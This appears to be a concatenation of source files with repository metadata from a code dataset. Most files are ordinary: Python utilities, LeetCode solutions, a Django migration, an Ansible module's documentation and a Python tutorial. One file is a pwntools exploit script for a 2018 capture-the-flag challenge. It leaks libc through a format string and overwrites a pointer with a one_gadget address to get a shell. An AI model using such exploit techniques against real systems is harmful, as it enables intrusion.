e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 232 |
py
|
#calss header
class _WINDLASSES():
def __init__(self,):
self.name = "WINDLASSES"
self.definitions = windlass
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['windlass']
|
[
"[email protected]"
] | |
8c8e0126b4969636ebe2d414567e598beb70bf2c
|
e9a9955da9bee9be6580f1b1a75f97a1f99d0289
|
/login/migrations/0016_auto_20190803_1452.py
|
eb4f2ea18f1fff82b8ba290db60a29457a52f715
|
[] |
no_license
|
Manjunatha1997/project_IT
|
bdb36142256b9d4eb1b75a76994d801dd3c33013
|
fe58a30d033d4f4ed818c0282a802fafcf3aaff5
|
refs/heads/master
| 2021-02-28T04:17:13.872903 | 2020-03-07T15:48:49 | 2020-03-07T15:48:49 | 245,661,299 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 637 |
py
|
# Generated by Django 2.1.7 on 2019-08-03 14:52
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0015_auto_20190803_0435'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='dob',
field=models.DateField(default=datetime.datetime(2019, 8, 3, 14, 52, 29, 693918)),
),
migrations.AlterField(
model_name='profile',
name='doj',
field=models.DateField(default=datetime.datetime(2019, 8, 3, 14, 52, 29, 693948)),
),
]
|
[
"[email protected]"
] | |
f17669184ef2e9e58cc9613ffd6e8add89126ea3
|
09e8c92187ff8d7a726727041e2dd80850dcce3d
|
/leetcode/028_implement_strStr_TRICKY.py
|
7154dcc9281455ccd29a545cb11042da6c8c43ad
|
[] |
no_license
|
kakru/puzzles
|
6dd72bd0585f526e75d026f3ba2446b0c14f60e0
|
b91bdf0e68605f7e517446f8a00b1e0f1897c24d
|
refs/heads/master
| 2020-04-09T09:47:31.341475 | 2019-05-03T21:24:41 | 2019-05-03T21:24:41 | 160,246,660 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,846 |
py
|
#/usr/bin/env python3
import unittest
class Solution:
def strStr(self, haystack, needle):
"""
:type haystack: str
:type needle: str
:rtype: int
"""
h_len = len(haystack)
n_len = len(needle)
i = 0
while i <= h_len - n_len:
if haystack[i:i+n_len] == needle:
return i
i += 1
return -1
#
# There is a problem with a step by step solution it's easy to forget about:
# haystack="mississippi", needle="issippi"
# mississippi
# issippi --> X
# mississippi
# issippi --> OK
# the loop index on the haystack cannot go back to 0 !!
class BasicTest(unittest.TestCase):
def test_1(self):
input_ = "hello", "ll"
expected_output = 2
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_2(self):
input_ = "helo", "ll"
expected_output = -1
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_3(self):
input_ = "abc", ""
expected_output = 0
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_4(self):
input_ = "abc"*100000, "cab"
expected_output = 2
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_5(self):
input_ = "a", "a"
expected_output = 0
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_6(self):
input_ = "mississippi", "issippi"
expected_output = 4
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
[
"[email protected]"
] | |
ea641622136b336a1f7196b18e51f101df6df097
|
d45bb44b0dfabfeff37c21a6ac0be1362782e39a
|
/utils/import_bookmarks.py
|
ea763b006243bdea76577f71ce07e8fba1168997
|
[] |
no_license
|
SyJarvis/BookmarkManager
|
c25f9df8cb0d0719de805f8080a7ae78c5ac529c
|
dc3baf06fd47c4514b148134ee3d3fa03f7f1571
|
refs/heads/master
| 2023-03-26T17:14:17.776441 | 2021-03-21T14:58:58 | 2021-03-21T14:58:58 | 322,634,112 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 647 |
py
|
from pyquery import PyQuery as pq
class BookmarksTodb():
def __init__(self, filename='utils/bookmarks_2020_5_5_win.html'):
with open(filename, 'r+', encoding='utf-8') as file:
self.html = file.read()
self.doc = pq(self.html)
def get_cage_list(self):
cage_li = []
items = self.doc('H3')
for cage in items:
cage_li.append(cage.text)
return cage_li
def get_url_list(self):
lis = self.doc('A').items()
datas = []
for li in lis:
url_params = {}
url_params['url'] = li.attr('href')
url_params['title'] = li.text()
print(url_params)
datas.append(url_params)
return datas
|
[
"[email protected]"
] | |
44f7d5e6d9055b7acb7c3147d5e6aa735fc3ce3e
|
a09e70355b756bd5cba55246e17eb0480af6257b
|
/examples/ble_demo_central.py
|
eb56a9cb9b54270e50eb0709aed3104e43dfecc4
|
[
"MIT"
] |
permissive
|
devoh747/Adafruit_CircuitPython_BLE
|
9735381dc3481661af54ac32d89ec40e006edc5b
|
7566483e2dbdb1bf6c71d5629a2ed37b113c7cff
|
refs/heads/master
| 2020-08-09T04:14:59.774817 | 2019-10-10T21:11:07 | 2019-10-10T21:11:07 | 213,995,226 | 0 | 0 |
MIT
| 2019-10-09T18:33:32 | 2019-10-09T18:33:32 | null |
UTF-8
|
Python
| false | false | 1,319 |
py
|
"""
Demonstration of a Bluefruit BLE Central. Connects to the first BLE UART peripheral it finds.
Sends Bluefruit ColorPackets, read from three potentiometers, to the peripheral.
"""
import time
import board
from analogio import AnalogIn
#from adafruit_bluefruit_connect.packet import Packet
# Only the packet classes that are imported will be known to Packet.
from adafruit_bluefruit_connect.color_packet import ColorPacket
from adafruit_ble.scanner import Scanner
from adafruit_ble.uart_client import UARTClient
def scale(value):
"""Scale an value from 0-65535 (AnalogIn range) to 0-255 (RGB range)"""
return int(value / 65535 * 255)
scanner = Scanner()
uart_client = UARTClient()
a3 = AnalogIn(board.A3)
a4 = AnalogIn(board.A4)
a5 = AnalogIn(board.A5)
while True:
uart_addresses = []
# Keep trying to find a UART peripheral
while not uart_addresses:
uart_addresses = uart_client.scan(scanner)
uart_client.connect(uart_addresses[0], 5)
while uart_client.connected:
r = scale(a3.value)
g = scale(a4.value)
b = scale(a5.value)
color = (r, g, b)
print(color)
color_packet = ColorPacket(color)
try:
uart_client.write(color_packet.to_bytes())
except OSError:
pass
time.sleep(0.3)
|
[
"[email protected]"
] | |
26abf2b58ee4ed7a69f2c069c5026e46fd6d5427
|
419873dd3b7412f704b1a7907b64a60b44cedf39
|
/python/树/103. 二叉树的锯齿形层次遍历.py
|
b3b9739640c5bbaeecf8e7c3f913e970275761a9
|
[] |
no_license
|
Weless/leetcode
|
0585c5bfa260713f44dabc51fa58ebf8a10e7814
|
0566622daa5849f7deb0cfdc6de2282fb3127f4c
|
refs/heads/master
| 2021-11-13T07:59:20.299920 | 2021-10-25T02:09:53 | 2021-10-25T02:09:53 | 203,720,668 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 818 |
py
|
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
from typing import List
class Solution:
def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
from collections import deque
queue = deque()
queue.append(root)
res = []
level = 1
while queue:
tmp = []
for _ in range(len(queue)):
node = queue.popleft()
tmp.append(node.val)
if node.left: queue.append(node.left)
if node.right: queue.append(node.right)
if level % 2 == 0:
res.append(tmp[::-1])
else:
res.append(tmp)
level += 1
return res
|
[
"[email protected]"
] | |
9fde6b1cc14c9a979633c4f2df97f24dca4d78bb
|
84290c584128de3e872e66dc99b5b407a7a4612f
|
/Supervised Learning with scikit-learn/Preprocessing and pipelines/Centering and scaling.py
|
c21eb26fe58bf9a8d53c990a24d3b0ab871dee0b
|
[] |
no_license
|
BautizarCodigo/DataAnalyticEssentials
|
91eddc56dd1b457e9e3e1e3db5fbbb2a85d3b789
|
7f5f3d8936dd4945ee0fd854ef17f04a04eb7b57
|
refs/heads/main
| 2023-04-11T04:42:17.977491 | 2021-03-21T19:05:17 | 2021-03-21T19:05:17 | 349,784,608 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 504 |
py
|
# Import scale
from sklearn.preprocessing import scale
# Scale the features: X_scaled
X_scaled = scale(X)
# Print the mean and standard deviation of the unscaled features
print("Mean of Unscaled Features: {}".format(np.mean(X)))
print("Standard Deviation of Unscaled Features: {}".format(np.std(X)))
# Print the mean and standard deviation of the scaled features
print("Mean of Scaled Features: {}".format(np.mean(X_scaled)))
print("Standard Deviation of Scaled Features: {}".format(np.std(X_scaled)))
|
[
"[email protected]"
] | |
a8ba14a006fb88ac5415201cfab9678983738d9d
|
b47f2e3f3298388b1bcab3213bef42682985135e
|
/experiments/fdtd-2d/tmp_files/2238.py
|
6dfcdd1cd9629a3c959c2e3b61310de6617d05bf
|
[
"BSD-2-Clause"
] |
permissive
|
LoopTilingBenchmark/benchmark
|
29cc9f845d323431e3d40e878cbfc6d1aad1f260
|
52a3d2e70216552a498fd91de02a2fa9cb62122c
|
refs/heads/master
| 2020-09-25T09:45:31.299046 | 2019-12-04T23:25:06 | 2019-12-04T23:25:06 | 225,975,074 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 411 |
py
|
from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/fdtd-2d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/fdtd-2d/tmp_files/2238.c')
procedure('kernel_fdtd_2d')
loop(0)
known(' nx > 1 ')
known(' ny > 1 ')
tile(1,2,20,2)
tile(1,4,16,4)
tile(2,2,20,2)
tile(2,4,16,4)
tile(3,2,20,2)
tile(3,4,16,4)
|
[
"[email protected]"
] | |
bd6651931aed58d7bfd2c1949c7dea3b99edfd6c
|
b685036280331fa50fcd87f269521342ec1b437b
|
/src/data_mining_demo/py_shuJuWaJue_ruMen_yu_ShiJian/chapter3/demo2.py
|
7e2ee679470b22f9af507b2f12f77a6431309659
|
[] |
no_license
|
chenqing666/myML_DM_Test
|
f875cb5b2a92e81bc3de2a0070c0185b7eacac89
|
5ac38f7872d94ca7cedd4f5057bb93732b5edbad
|
refs/heads/master
| 2022-02-26T01:52:06.293025 | 2019-09-20T06:35:25 | 2019-09-20T06:35:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 175 |
py
|
import pickle
import numpy as np
import pandas as pd
datafile = "./cleanedData.dai"
with open(datafile, 'rb') as file:
dataset = pickle.load(file)
print(dataset.head())
|
[
"[email protected]"
] | |
71b2e819f9b87e7fec810e93dc2fb3d1006ac89d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_combos.py
|
cac18802b80f0f4ecc83aabd2e7d23ba1ed8481a
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 231 |
py
|
from xai.brain.wordbase.nouns._combo import _COMBO
#calss header
class _COMBOS(_COMBO, ):
def __init__(self,):
_COMBO.__init__(self)
self.name = "COMBOS"
self.specie = 'nouns'
self.basic = "combo"
self.jsondata = {}
|
[
"[email protected]"
] | |
82812f0cb1ad89fee4e2c4ad453429f5b4e8cc8f
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_118/619.py
|
85060cf54efea0ef148ad0160403ca71cbb9b978
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 596 |
py
|
# -*- coding: utf-8 -*-
import sys
def is_palindrome(num):
s1 = str(num)
s2 = s1[::-1]
return s1 == s2
fair_numbers = []
for i in range(pow(10, 7)+1):
if is_palindrome(i):
num = i*i
if is_palindrome(num):
fair_numbers.append(num)
N = int(sys.stdin.readline())
for T in range(1, N+1):
min_val, max_val = map(int, sys.stdin.readline().strip().split())
ans = 0
for num in fair_numbers:
if num < min_val:
continue
if num > max_val:
break
ans += 1
print 'Case #%(T)s: %(ans)s' % locals()
|
[
"[email protected]"
] | |
c0056aa85383d670add5f74e627672b310c662ce
|
a867b1c9da10a93136550c767c45e0d8c98f5675
|
/G_LC_1055_ShortestWaytoFormString.py
|
057fd0b488c0696e709603ccc3d5993c1b5d2c98
|
[] |
no_license
|
Omkar02/FAANG
|
f747aacc938bf747129b8ff35b6648fb265d95b6
|
ee9b245aa83ea58aa67954ab96442561dbe68d06
|
refs/heads/master
| 2023-03-25T19:45:08.153403 | 2021-03-28T07:13:08 | 2021-03-28T07:13:08 | 280,783,785 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 835 |
py
|
# import __main__ as main
# from Helper.TimerLogger import CodeTimeLogging
# fileName = main.__file__
# fileName = fileName.split('\\')[-1]
# CodeTimeLogging(Flag='F', filename=fileName, Tag='String', Difficult='Medium')
def shotestWaytoFormString(scr, target):
numMinString = 0
remaning = target
while len(remaning) != 0:
subsequence = ""
i = j = 0
while i < len(scr) and j < len(remaning):
if scr[i] == remaning[j]:
subsequence += remaning[j]
j += 1
i += 1
if len(subsequence) == 0:
return -1
numMinString += 1
remaning = remaning[len(subsequence):]
return numMinString
scr = "abc"
target = "abcbc"
scr = "abc"
target = "abcdbc"
a = [1, 2, 3, 4, 5]
print(shotestWaytoFormString(scr, target))
|
[
"[email protected]"
] | |
3ef7e25a59a3ca2672554115318f33e31822fd25
|
e5dc27e634aba70bcd1b3acea74fed84ddccf837
|
/plugins/modules/template_project.py
|
432a757ecb62ba97acf49d326d6c97cb68fe269b
|
[] |
no_license
|
jejrichardson/dnacenter-ansible
|
264d1b52227d4bf78ad175494763cff9e7881f34
|
f10078ef8323bda4b542e71bcecf4f80a7fe0609
|
refs/heads/master
| 2023-01-28T09:54:57.449459 | 2020-12-09T23:15:49 | 2020-12-09T23:15:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,792 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2020, Rafael Campos <[email protected]>
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {
"metadata_version": "0.0.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: template_project
short_description: Manage TemplateProject objects of ConfigurationTemplates
description:
- Returns the projects in the system.
- Creates a new project.
- Updates an existing project.
- Deletes an existing Project.
version_added: '1.0'
author: Rafael Campos (@racampos)
options:
name:
description:
- Name of project to be searched.
- ProjectDTO's name.
type: str
createTime:
description:
- ProjectDTO's createTime.
type: int
description:
description:
- ProjectDTO's description.
type: str
id:
description:
- ProjectDTO's id.
type: str
lastUpdateTime:
description:
- ProjectDTO's lastUpdateTime.
type: int
tags:
description:
- ProjectDTO's tags (list of strings).
type: list
templates:
description:
- ProjectDTO's templates.
type: dict
project_id:
description:
- ProjectId path parameter.
- Required for state delete.
type: str
requirements:
- dnacentersdk
seealso:
# Reference by module name
- module: cisco.dnac.plugins.module_utils.definitions.template_project
# Reference by Internet resource
- name: TemplateProject reference
description: Complete reference of the TemplateProject object model.
link: https://developer.cisco.com/docs/dna-center/api/1-3-3-x
# Reference by Internet resource
- name: TemplateProject reference
description: SDK reference.
link: https://dnacentersdk.readthedocs.io/en/latest/api/api.html#v2-1-1-summary
"""
EXAMPLES = r"""
- name: get_projects
cisco.dnac.template_project:
state: query # required
name: SomeValue # string
register: query_result
- name: create_project
cisco.dnac.template_project:
state: create # required
createTime: 1 # integer
description: SomeValue # string
id: SomeValue # string
lastUpdateTime: 1 # integer
name: SomeValue # string
tags:
- SomeValue # string
templates: None
- name: update_project
cisco.dnac.template_project:
state: update # required
createTime: 1 # integer
description: SomeValue # string
id: SomeValue # string
lastUpdateTime: 1 # integer
name: SomeValue # string
tags:
- SomeValue # string
templates: None
- name: delete_project
cisco.dnac.template_project:
state: delete # required
project_id: SomeValue # string, required
"""
RETURN = """
get_projects:
description: Returns the projects in the system.
returned: always
type: dict
contains:
payload:
description: It is the template project's payload.
returned: always
type: list
contains:
name:
description: It is the template project's name.
returned: always
type: str
sample: '<name>'
id:
description: It is the template project's id.
returned: always
type: str
sample: '478012'
templates:
description: It is the template project's templates.
returned: always
type: list
contains:
name:
description: It is the template project's name.
returned: always
type: str
sample: '<name>'
composite:
description: It is the template project's composite.
returned: always
type: bool
sample: false
id:
description: It is the template project's id.
returned: always
type: str
sample: '478012'
create_project:
description: Creates a new project.
returned: success
type: dict
contains:
response:
description: ProjectDTO's response.
returned: success
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: success
type: dict
url:
description: It is the template project's url.
returned: success
type: str
sample: '<url>'
version:
description: ProjectDTO's version.
returned: success
type: str
sample: '1.0'
update_project:
description: Updates an existing project.
returned: changed
type: dict
contains:
response:
description: ProjectDTO's response.
returned: changed
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: changed
type: dict
url:
description: It is the template project's url.
returned: changed
type: str
sample: '<url>'
version:
description: ProjectDTO's version.
returned: changed
type: str
sample: '1.0'
delete_project:
description: Deletes an existing Project.
returned: success
type: dict
contains:
response:
description: Response, property of the response body.
returned: success
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: success
type: dict
url:
description: It is the template project's url.
returned: success
type: str
sample: '<url>'
version:
description: Version, property of the response body.
returned: success
type: str
sample: '1.0'
"""
|
[
"[email protected]"
] | |
ce4cb92d76d50fbd63accaff41bd8af8bbd952e1
|
0f9b6a33a5e2ce627db75d1bcc34bc3f3674335b
|
/sctf/2018/catchthebug/exploit.py
|
10ff19c7084f606481adcd2e34de7136bf30a20a
|
[] |
no_license
|
hnoson/writeups
|
359a33b03286bab19359ad9b089e6f3bfe4fb708
|
05550e3c462108f6c5ba0b69f65694e2eb1dc9b3
|
refs/heads/master
| 2021-10-07T18:21:26.041101 | 2021-10-03T10:22:31 | 2021-10-03T10:22:31 | 119,823,623 | 7 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,927 |
py
|
#!/usr/bin/env python
from pwn import *
def catch(name):
while True:
s.sendlineafter('>> ', '1')
s.recvline()
if s.recvline(False) == 'There is no bug =(':
continue
s.sendafter('>> ', name)
break
def inspect(num):
s.sendlineafter('>> ', '2')
ret = []
for i in range(num):
s.recvuntil('==\n')
ret.append((s.recvline(False), len(s.recvuntil('=')) - 2))
return ret
def submit(title = 'A' * 0x40, subtitle = 'A' * 0x80, body = 'A' * 0x100, tag = 'A' * 8, password = 'A' * 8):
s.sendlineafter('>> ', '3')
s.sendafter('title\n', title)
s.sendafter('subtitle\n', subtitle)
if len(body) < 0x100:
body += '\n'
s.sendafter('body\n', body)
if len(tag) < 8:
tag += '\n'
s.sendafter('tag\n', tag)
s.sendafter('password\n', password)
if __name__ == '__main__':
# context.log_level = 'DEBUG'
if len(sys.argv) == 1:
s = process('./bug_3e99623da36874fd424a4e237866e301d292aa66')
# s = process('./bug_3e99623da36874fd424a4e237866e301d292aa66', env = {'LD_PRELOAD': './libc-2.26.so_cc8df6278e095fcc4ca8a98e1f1c69c04db30a4c'})
else:
s = remote('catchthebug.eatpwnnosleep.com', 55555)
libc = ELF('./libc-2.26.so_cc8df6278e095fcc4ca8a98e1f1c69c04db30a4c')
one_gadgets = [0x47c46, 0x47c9a, 0xfccde, 0xfdb8e]
catch('%p\n')
catch('AAAA')
catch('AAAA')
res = inspect(3)
libc_base = int(res[0][0], 16) - libc.symbols['_IO_2_1_stdout_'] - 131
log.info('libc base: %#x' % libc_base)
length = 8 * 3 + sum([l for _, l in res]) + 0x40 + 0x80
log.info('report length: %#x' % length)
if length < 0x618:
print 'try again'
exit(0)
body = 'A' * (0x708 - length)
body += p64(libc_base + 0x608040 + 3840 - len(body) - 0x9)
tag = p64(libc_base + one_gadgets[2])
submit(body = body, tag = tag)
s.interactive()
|
[
"[email protected]"
] | |
88bd31ecc6bd237466ec96a185b1d943f4ead144
|
2d060eb9c7126b8963adcad857daa6e39c6ac75f
|
/Resist.py
|
12e4f998383248c49443c1a4b9fc74c578754390
|
[] |
no_license
|
easy-rpg/Filler
|
43ce36980156f4ffd9597d822e9fa6c19105d892
|
55cddbbb21ac508f64b98ceedbc30c680d4c4951
|
refs/heads/master
| 2020-03-15T01:38:51.069870 | 2016-09-03T07:12:55 | 2016-09-03T07:12:55 | 131,898,370 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 560 |
py
|
import abc
class Resist_Boa(object):
"""docstring for """
__metaclass__ = abc.ABCMeta
valores = [2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12]
@abc.abstractmethod
def __str__(self):
raise NotImplementedError('users must define __str__ to use this base class')
class Resist_Ruim(object):
"""docstring for """
__metaclass__ = abc.ABCMeta
valores = [0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 6]
@abc.abstractmethod
def __str__(self):
raise NotImplementedError('users must define __str__ to use this base class')
|
[
"[email protected]"
] | |
1c29302c75eba77721ac08ae1689249996414741
|
5864e86954a221d52d4fa83a607c71bacf201c5a
|
/eve/client/script/ui/station/fitting/stanceSlot.py
|
4f84e19f8e8023622408b00954931ab6ab6a422f
|
[] |
no_license
|
connoryang/1v1dec
|
e9a2303a01e5a26bf14159112b112be81a6560fd
|
404f2cebf13b311e754d45206008918881496370
|
refs/heads/master
| 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,646 |
py
|
#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\ui\station\fitting\stanceSlot.py
from carbonui.primitives.container import Container
from eve.client.script.ui.inflight import shipstance
import carbonui.const as uiconst
class StanceSlots(Container):
def __init__(self, **kw):
super(StanceSlots, self).__init__(**kw)
def _GetAngles(self):
return [ 258 - i * 10 for i in xrange(3) ]
def ApplyAttributes(self, attributes):
Container.ApplyAttributes(self, attributes)
self.controller = attributes.controller
typeID = attributes.typeID
if typeID is None:
typeID = sm.GetService('invCache').GetInventoryFromId(attributes.shipID).GetItem().typeID
self.shipstances = []
for angle in self._GetAngles():
pos = attributes.angleToPos(angle)
newPos = (pos[0],
pos[1],
32,
32)
self.shipstances.append(shipstance.ShipStanceFittingButton(shipID=attributes.shipID, typeID=typeID, parent=self, pos=newPos, align=uiconst.TOPLEFT, controller=self.controller))
def ShowStances(self, shipID, typeID):
btnControllerClass = self.controller.GetStanceBtnControllerClass()
shipStanceButtonsArgs = btnControllerClass().get_ship_stance_buttons_args(typeID, shipID)
for idx, kwargs in enumerate(shipStanceButtonsArgs):
stanceButton = self.shipstances[idx]
stanceButton.SetAsStance(shipID, typeID, kwargs['stanceID'], kwargs['stance'])
def GetStanceContainers(self):
return self.shipstances
|
[
"[email protected]"
] | |
09da3887cf75a54b9d1965126cebae0ddf5f6475
|
6929f9696a8f90b3778d449a199cee8891f3f739
|
/python_core/deligating_to_parent_class_and_slots.py
|
c23b6fab9843575d3946b69e50da5f32471b0dc8
|
[] |
no_license
|
chemplife/Python
|
881d492a4271fb2b423f2dd611eaac53a0efdc34
|
7fdfbf442a915e4f41506503baad4345a52d1e86
|
refs/heads/master
| 2022-12-31T20:00:22.475985 | 2020-10-19T20:14:43 | 2020-10-19T20:14:43 | 305,503,403 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,720 |
py
|
'''
super().method()/attribute
-> To deligate things back to the parent class.
-> Use this only when you have the same named function in the child as well.. Because Python anyways will look uo the heirarchy
if it does not find the method in Child-class.
Eg: class A:
def b():
class B(A):
def c():
return self.b() <- is same as -> return super().b() <- Because 'class B'' does not have 'def b()' of its own.
self: binds the instance of the object to the method anywhere in the herarchy.
** if the 'Parent-Class' has '__init__(seld, name)' method that takes in an argument and the 'Child-Class' does not have a '__init__(self)' defined:
-> 'Child-Class' instance need that argument (name) because it is inheritied from the 'Parent Class'
'''
class Person:
def hello(self):
print('In Person Class: ', self)
class Student(Person):
def hello(self):
print('In Student Class: ', self)
super().hello()
p = Person()
s = Student()
p.hello()
print('\n')
# Looks at the address of 'self'.. it is the same in 'Person Class' as it is for 'Student Class'
s.hello()
print('\n\n-------------------------------- Combined Example: Property/Inheritance/Deligate/Caching --------------------------------')
from math import pi
from numbers import Real
class Circle:
def __init__(self, r):
self.radius = r
self._area = None
self._perimeter = None
@property
def radius(self):
return self._r
@radius.setter
def radius(self, r):
if isinstance(r, Real) and r > 0:
self._r = r
self._area = None
self._perimeter = None
else:
raise ValueError('Radius must be a Positive Real Number.')
@property
def area(self):
if self._area is None:
self._area = pi * self.radius **2
return self._area
@property
def perimeter(self):
if self._perimeter is None:
self._perimeter = 2 * pi * self.radius
return self._perimeter
class UnitCircle(Circle):
def __init__(self):
super().__init__(1)
u = UnitCircle()
print('UnitCircle Radius:', u.radius)
print('UnitCircle Area:', u.area)
print('UnitCircle Perimeter:', u.perimeter)
#But this will work..
u.radius = 10
print('\nProblem: UnitCircle Radius:', u.radius)
# To make the Radius for Unit-Circle read-only..
class UnitCircle_1(Circle):
def __init__(self):
super().__init__(1)
@property
def radius(self):
return self.radius # return super().radius ;; will work the same.
# Now it will not work... even without setting u1.radius=10.. Because now, the 'self.radius' in 'circle.__init__()' does not take any argument.
# ** we cannot call the 'radius.setter' from outside of the class.
# u1 = UnitCircle_1()
# u1.radius = 10
# print('\nProblem: UnitCircle_1 Radius:', u1.radius)
# To fix, this, we need to make the 'self.radius' in 'circle.__init__()' call a method to set radius..
class Circle:
def __init__(self, r):
self._set_radius(r)
self._area = None
self._perimeter = None
@property
def radius(self):
return self._r
def _set_radius(self, r):
if isinstance(r, Real) and r > 0:
self._r = r
self._area = None
self._perimeter = None
else:
raise ValueError('Radius must be a Positive Real Number.')
@radius.setter
def radius(self, r):
self._set_radius(r)
@property
def area(self):
if self._area is None:
self._area = pi * self.radius **2
return self._area
@property
def perimeter(self):
if self._perimeter is None:
self._perimeter = 2 * pi * self.radius
return self._perimeter
class UnitCircle_1(Circle):
def __init__(self):
super().__init__(1)
@property
def radius(self):
return super().radius
u = UnitCircle_1()
print('\n')
print('UnitCircle Radius:', u.radius)
print('UnitCircle Area:', u.area)
print('UnitCircle Perimeter:', u.perimeter)
#Now this will not work..
# u.radius = 10
# print('\nProblem: UnitCircle Radius:', u.radius)
print('\n\n------------------------------------------- Slots -------------------------------------------\n')
'''
Class inherently use 'DICTIONARY' to store all the attributes.
But when we have a lot of instances of the class.. it will create a lot of memory-overhead..
To do it in a better 'memory-efficient-way'.. SLOTS are used
Slots- more compact datastructe that Python.
We need to tell slots what all attributes we will have in advance.
__slots__ = ('x', 'y')
('x', 'y') -> Iterable..
__slots__ -> tells Python that don't use dictionary.. use slots..
Now, Both of these will give error
-> obj.__dict__ : Attribute Error
-> vars(obj) : Tyoe Error
But -> dir(obj) : will tell us about 'x' and 'y'
Slots V/S Dict
-> Slots are 'Memory-Effecient' : Save 10 times the memory compared to Dict.
-> Slots are 'Time-Effecient' : Runs 30% faster then Dict.
-> Slots: Cannot add attributes (Monkey-Patching) during the program.. Dict, we can add attributes on the fly..
'''
class Location:
__slots__ = 'name', '_longitude', '_latitude'
def __init__(self, name, *, longitude, latitude):
self._longitude = longitude
self._latitude = latitude
self.name = name
@property
def longitude(self):
return self._longitude
@property
def latitude(self):
return self._latitude
print('Location Dict: ', Location.__dict__)
Location.map_service = 'Google Maps'
print('\nLocation Dict after Attribute Addition: ', Location.__dict__)
#But we don't have Instance-Dictionary
l = Location('Delhi', longitude=100, latitude=72)
# print('\nLocation Instance Dict: ', l.__dict__)
print('\n\n--------------------------- Slots with Single Inheritance ---------------------------\n')
'''
-> 'Child-Class' will use the 'slots' FROM 'Parent-Class' if present. But 'Child-Class' will have its own '__dict__' to store attributes.
-> 'Child-Class' can have 'slots' even if 'Parent-Class' DON'T have it. 'Child-Class' will still have a '__dict__' to store attributes.
-> If Child-Class also needs to have 'Slots', mention those in the 'Child-Class' which are not in 'Parent-Class'.. Don't re-mention attributes.
-> If re-mentioned:
-> In future updates from Python it will break (It is marked to have a 'check-on' in future.)
-> It hides the Parent Attribute and can cause problems.
-> Increase memeory overhead due to re-mentioning..
************************
How to use both 'Slots' and '__dict__'?
-> __slots__ = 'attributes', .. , '__dict__'
-> Now, we can add more attributes during run-time.. (__dict__ is not dropped..)
-> Nowly added attributes will get stored in '__dict__' and not in 'slots'
'''
class Person:
__slots__ = 'name'
class Student(Person):
pass
p = Person()
s = Student()
s.name = 'Alex'
print('Student Instance Dict: ', s.__dict__)
s.age = 18
print('\nStudent Instance Dict: ', s.__dict__)
# This will not work
#print('Person Instance Dict: ', p.__dict__)
|
[
"[email protected]"
] | |
d022d56454d570a5b887704c79d4d2843271f345
|
576cc83449e10fd3f98281970c46016ea7a5aea2
|
/OpenCV拟合与特征点识别/模板匹配角度.py
|
78abfbc17a54a507b14bd408976b16d378badf18
|
[] |
no_license
|
HotView/PycharmProjects
|
215ab9edd341e3293daebcf86d97537f8cd28d75
|
61393fe5ba781a8c1216a5cbe7e0d06149a10190
|
refs/heads/master
